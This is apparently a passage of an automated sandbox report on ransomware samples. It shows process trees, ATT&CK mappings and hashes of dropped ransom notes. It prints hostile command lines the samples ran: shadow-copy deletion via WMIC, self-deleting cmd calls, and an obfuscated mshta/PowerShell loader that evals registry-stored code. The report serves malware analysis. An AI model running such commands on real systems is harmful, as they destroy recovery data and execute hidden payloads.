        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\HBTWDG~1.EXE
        6⤵
        
        PID:1724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00298\TROJAN~4.EXE
        5⤵
        
        PID:2880
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.noi-73a2ed1606f22e828554948d7f79dd99f2858bc3465e5065abcbf90d98583b3c.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:1432
    - - C:\Windows\ocenlufjyvdi.exe
        
        C:\Windows\ocenlufjyvdi.exe
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: RenamesItself
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2568
      - C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        6⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
      - C:\Windows\SysWOW64\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
        6⤵
        System Location Discovery: System Language Discovery
        Opens file in notepad (likely ransom note)
        Suspicious use of FindShellTrayWindow
        
        PID:2308
      - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\_ReCoVeRy_.HTM
        6⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2976
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2976 CREDAT:275457 /prefetch:2
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1408
      - C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        6⤵
        
        PID:3448
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\OCENLU~1.EXE
        6⤵
        
        PID:3564
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00298\TR1CEF~1.EXE
        5⤵
        
        PID:2352
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qkb-0f7b56a20b8b81412d2ad1f9b80ee6002f6875105f546a7a8404a43ed73b1ef4.exe"
      4⤵
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of AdjustPrivilegeToken
      PID:2220
    - - C:\Windows\fjyvdiaajoqw.exe
        
        C:\Windows\fjyvdiaajoqw.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00298\TRF2FF~1.EXE
        5⤵
        
        PID:1140
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2780
    - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe
        
        "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Bitman.qrz-717d61d17cda60a8fc6112e1f92ea2cb8bfec8dbecd91ab22e91159cf024bb24.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:2528
      - C:\Windows\khatelpdxqwo.exe
        
        C:\Windows\khatelpdxqwo.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:2056
        
        C:\Windows\khatelpdxqwo.exe
        
        C:\Windows\khatelpdxqwo.exe
        7⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        System policy modification
        
        PID:3940
        
        C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        8⤵
        
        PID:3376
        
        C:\Windows\SysWOW64\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_ReCoVeRy_.TXT
        8⤵
        System Location Discovery: System Language Discovery
        Opens file in notepad (likely ransom note)
        
        PID:1728
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\_ReCoVeRy_.HTM
        8⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:1976
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1976 CREDAT:275457 /prefetch:2
        9⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2572
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1976 CREDAT:209928 /prefetch:2
        9⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2636
        
        C:\Windows\System32\wbem\WMIC.exe
        
        "C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
        8⤵
        
        PID:3180
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Windows\KHATEL~1.EXE
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3084
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00298\TR0485~1.EXE
        6⤵
        
        PID:2288
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Cryptor.agg-8e68f65eb8f0e02cf203c31d8cbb5e5c30bc78e06d77272b4493ca1c97fc048d.exe"
      4⤵
      Executes dropped EXE
      Sets desktop wallpaper using registry
      System Location Discovery: System Language Discovery
      Modifies Control Panel
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:2252
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sysC63C.tmp"
        5⤵
        
        PID:3124
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Cryptor.asv-826b02f896032d0abb0afb2f4a5228f8dc148518f29007929cc8b5368dc1dec2.exe"
      4⤵
      Executes dropped EXE
      Sets desktop wallpaper using registry
      System Location Discovery: System Language Discovery
      Modifies Control Panel
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of UnmapMainImage
      PID:1836
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lukitus.htm
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2292
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2292 CREDAT:275457 /prefetch:2
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1520
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C del /Q /F "C:\Users\Admin\AppData\Local\Temp\sys7C8F.tmp"
        5⤵
        
        PID:3544
  - - C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Foreign.jpdw-0b6bd6dbd74117ce41d96712e6f309bd9809732517b6320c8370e0e9434e7e98.exe
      "C:\Users\Admin\Desktop\00298\Trojan-Ransom.Win32.Foreign.jpdw-0b6bd6dbd74117ce41d96712e6f309bd9809732517b6320c8370e0e9434e7e98.exe"
      4⤵
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      PID:3004
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1844
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1876
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1036
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1196
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1632
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2732
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:2872
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1672
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1916
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1648
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1236
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:916
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:936
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:592
- - C:\Windows\system32\cmd.exe
    cmd.exe
    3⤵
    PID:1600
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  PID:3000
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1516
- C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
  "C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2348
- - C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe
    "C:\Users\Admin\Desktop\00298\Trojan-Ransom.NSIS.Zerber.fk-bdffd754d6462d9db91edb3d7e65cab81279265e28054564e47773e0def807d6.exe"
    3⤵
    - Executes dropped EXE
    PID:2784
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\_ReCoVeRy_+xqdbu.txt
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1668

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1996

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1492562660-798576642195535845853083778-1658301457-189617826120640826401722518436"
1⤵
PID:1720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "6656316382125180372845572978906474747-16071370221970886166-19186916431986323923"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1888

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1826773499-326839129-1962446264-2803368061250882066-14794024061009056308-993330112"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2044

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2840

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-618359670182786434487712124142356643-1081025591395423279-555783061-12956010"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17615709052020185925943158530-1285646349527874433-101067708-50529810521996501"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2348

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2748

C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:Puv7SaSC9="bZ4";c1x4=new%20ActiveXObject("WScript.Shell");DiAMw38pcl="xQRf";Ps2kb=c1x4.RegRead("HKLM\\software\\Wow6432Node\\qREe7sEgko\\0FoAd3hnj");k8N3krxE="tUeP8";eval(Ps2kb);vtaU3wvI4="q0Le";
1⤵
- Process spawned unexpected child process
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2640
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:xpwprffh
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  PID:328
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32.exe
    3⤵
    - Looks for VirtualBox Guest Additions in registry
    - Looks for VirtualBox drivers on disk
    - Looks for VMWare Tools registry key
    - Checks BIOS information in registry
    - Drops startup file
    - Adds Run key to start application
    - Maps connected drives based on registry
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: MapViewOfSection
    PID:3564
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\SysWOW64\regsvr32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3780

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2022987474-1422485873-15363808911562129407-1911116563880402991-525473446-878659678"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:568

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2256

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:892

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:204

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2696

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2880

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:1660

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2836

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2296

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3960

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2924

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
PID:3592

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:2264

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x578
1⤵
PID:3816

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
PID:316

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3264

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
1⤵
- System Location Discovery: System Language Discovery
PID:3876

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
PID:3164

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
- System Location Discovery: System Language Discovery
PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

File and Directory Discovery

T1083

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceksj.html

Filesize
8KB

MD5
f393791bacbd656e2e304998d33e57c7

SHA1
ec09227f6c365379cbaf4882382995392a7e5c95

SHA256
04839ac1278ced656579d9f99ff46162e5b94ecac130423ae42f59788fb0cfd3

SHA512
57e23793fde30fb044a3b543f6ef2103afd637c7dabcb65609e03497dfbbd62650b39437c0dbbbd5323e6fde48744f51d1df19848aaf5fe4536184a9eadcf1dc

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceksj.png

Filesize
67KB

MD5
1e9639afd880711998004098c1d8e6fa

SHA1
eb605197ea635a00f5286947cd6a6b7719e56644

SHA256
3f8051d0be40956a000aecb5ad185169cdfc949fc5ceb4e27e49694e610d6b5a

SHA512
d5021e093a20349c1152c2bd323cb1f9082bc3c277d32dac281936956f06c8d64cb64510ddf3116d0798bdb2efd5b69e14ebf3e0296b63cf78226f59408f81c3

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+ceksj.txt

Filesize
2KB

MD5
08246ee5fa48eae7e1a3a5881823abca

SHA1
4b533a07f5d5e2dfddbf0ebd8743b2171af2170e

SHA256
206166b42ba8f0a27ae409733912af73531ca7ba7bde64ab1e43658bf9fc8295

SHA512
4f8f0182a14751ddf9f4e8df631e1da38a72d82db0b89d5fd052c5345f1eec0609a88efd36c67dd40b4e9524c44b288c11571848f256b81e94b7fdcaf113eb1c

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dxqdb.html

Filesize
11KB

MD5
23f1307619f00a0be2608b0c2b86650f

SHA1
d66b23055cffd087ecfaf60f08e3b246635ccaa9

SHA256
3a6fe9261b840c2a9f07df6699c749e043918120aa1713f3c9b956e9eb74849a

SHA512
25123f3942b247912cdbd7bf7bc1aac9d98084c3b5b6933cbe5b74acd7354d6c21515771f629effd1948d2d76d4c5299dec4ca25335e4fda291496329a82aa20

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dxqdb.png

Filesize
63KB

MD5
507b6671aa53613db1bc47f67d377fa5

SHA1
fbfb3bc0bd7d296801f80be255c9e5979a311ca2

SHA256
24d680b73c25ba75d34409206460d3f2fd3c048d238077a9bb0549215fc77282

SHA512
d8a76c1be5f8389a865739186b7d7f0154dd6fcd5e6d1d40f286adc06d59ac98c37ecd2559dd0695db36affa1f65504d6ead5d235932635968f85a49d85c5a17

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_RECoVERY_+dxqdb.txt

Filesize
1KB

MD5
f2b9d03047572c5111a7d53d45ae29fc

SHA1
9d746f2854bc55cd9c5803ba95ea674982701d1d

SHA256
3d98210a7ca622fdbb51bb38daca69746ba0a2a60d2a416785f9692f6e6c842f

SHA512
c0d068ca6e046fbbc660b03d1b7552ef60ac06aa52519db4b7de5569bfbe62f05cf8bd64ac36600e87841d2b0b481694c91c8f8df76b8aa0e8a5fdc4d38ad963

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cpvxr.html

Filesize
14KB

MD5
480b554d5fe43377b7887b4e852792f4

SHA1
33c5f43801c469a4d20399ba655ef9debca8124f

SHA256
591d6940d2d798ac02b6d4cd4067eff27c96c41f968bbebb858e4366e8e8dbbb

SHA512
70bd27c81b34258959a3f63fcdd8d5f454a6e18e5a7fbd416b49a94567e1365fc5fca4b33abfcb6436d2ebf65ab913f0499adda9bd48cb4307ada693d244cc4d

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cpvxr.png

Filesize
64KB

MD5
984a1a66f65ac04d9f5cf4fd0064a2a8

SHA1
9aa766c24345303708db65ec653dc103dbced5e9

SHA256
ee9617b7e47bdff079181a4384d2a46b009900414c9da6c1f0c067b62c511231

SHA512
d55dc651cffa5f8e3b39ab7952a8d2498f19f54f5ead17f0819a661d33672a949b340832380bf50aae56b5b374d2332985cb762c3c68182821bb2bfb6538b5d2

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+cpvxr.txt

Filesize
1KB

MD5
ddad8ecbc64bcf32efd62dc0977ad0e1

SHA1
55e652beb0959e106b9477fb60bdfd6a5da0c339

SHA256
1aa6f9cd745e1e4a8e420c11087fe14c0b02a51d2f88415ab99448f3d0ede423

SHA512
ed921f3d4ff31fa9044abe532d3464aadab82e76fedcfe2dc84b7e6347678625bdfc24d59f4d0a95cd6abca56fb8da1349686f0d0382cde1a7b29bfa85e621b1

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+xqdbu.html

Filesize
12KB

MD5
536e3c9343b3292b2e69f93254c73fbf

SHA1
9afaae5eab5823b4a7731e2a1f2a3f005cf01a74

SHA256
afb9c9560f3fb7e75f41be78c86e5c5e91ec288c9ca29622e2db6a274723dc6f

SHA512
e1d3a4895ccb6565172b52b8168ac488bc99e18d4d2ef3c08cd546a494aa1ba0a071755a6974e12b867db13c3f76d95ac1449a2871539804510a3754f27e4b69

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+xqdbu.png

Filesize
36KB

MD5
5d59fe50a2e748f0d836e0237eed2fbe

SHA1
7bbef778ae89fb992d80b34329f0457f82049cca

SHA256
00143f4437165db6d6ef7f714afb0e296f06376b8ec8ee52dd895607fe1a45eb

SHA512
fe87a0d12fc423b54a52d0e62f0e96a3a9b613e7ab8cd5cd7e31586d60955d0fbfabc0e3d698e549c34353393ca22b147d7e8d744c475f95d9d4cc8e46dffa94

Download Submit
C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+xqdbu.txt

Filesize
900B

MD5
10e254e29e2a0f7f42db52118d54a593

SHA1
a23e10e6647910fc99a7a17346c1fdaaed5bd4f4

SHA256
2adaaf06cf3a8c6bace45abe0bac68f2f37fd378ccb392ec18a670817efb8fdc

SHA512
a54ebe4ff64e3f8a6147ba0784d73e03bb13b892b7b9fc62799d00200b951d4f19a390dc3a6122a47efcc39eeed6b80f5859a94f65f0aa10c86de74e7550cde4

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

Filesize
11KB

MD5
52090025f1b807fcccb6b2d4fc70472a

SHA1
8b684425859cc1f67e0cc5a0a5683e102f509963

SHA256
cd5b914e5d6dce4030d9449da5569a24bde729b1fe46c8346a3639fc053f9be1

SHA512
414c62a5007cbdefba4ea597310985fbad3ef047868a394ff2e880ab7e335655a7eb4eff321db8903e85228a53145504e902edb454b81a5055dc3e82ecc1447e

Download Submit
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

Filesize
109KB

MD5
c1f756356f82b90825268a9662e09201

SHA1
255f5b397333d33d0217e794f4c2fc248e340b0f

SHA256
581da2124d346ab9af0d05d6e617d6d4ff2aeaa5f3f1bb8d77dbc8f52b4966c0

SHA512
bf3c749aa888f87c66bc39e8081951e7f311b4379d0f4c923ad137ea844d13ea43a14bf62ad4cc1fd9758eae756b1332508a9fb46ff9012ff69fd78b6ad92231

Download Submit
C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

Filesize
173KB

MD5
8338ed28496aea621ba132de6f9a0a28

SHA1
de0afd91f052bbd4e16c37ff0e27ce9fe87725e9

SHA256
c4ab6662d232a41dd57ea32902a7eea32942e7f91f94a13776d752038f8145f8

SHA512
1925c713bff14e33b0d4eef432fd96fca7412aff0042e736fd042a7359a18f500382b42eb5a93e4191cb98546fdaed2a1f4be238613d4961a00f51ad6513542c

Download Submit
C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\lukitus-1676.htm

Filesize
9KB

MD5
e40fc61d022018cc9f3ccc9c9a0d3f5e

SHA1
f7df2d8435a3fd46a825b1417309d205e13674a1

SHA256
28e9d12712f4f944f61b962739b115daf915beac3cf8b525f2d61b9e428ab6c2

SHA512
7321becfa2b70ecd9d9e03e787286f5ef7913bbe87468fc51b7fcf3c2fb4c7c4fc8e57e03cca36bfb5ed6776acf0ec766691b781bf7925db8641c2edb9deeebb

Download Submit
C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages\de-DE\lukitus-5b71.htm

Filesize
8KB

MD5
ff5ffe89720de8e35948c617381d6da1

SHA1
6eee4a63855d60915b5ef7bdc6183f81063fc0d3

SHA256
51435168344bdfff4fb46f3bba2aa8fdd3d639a5ff5fd5d3af298fac8002a221

SHA512
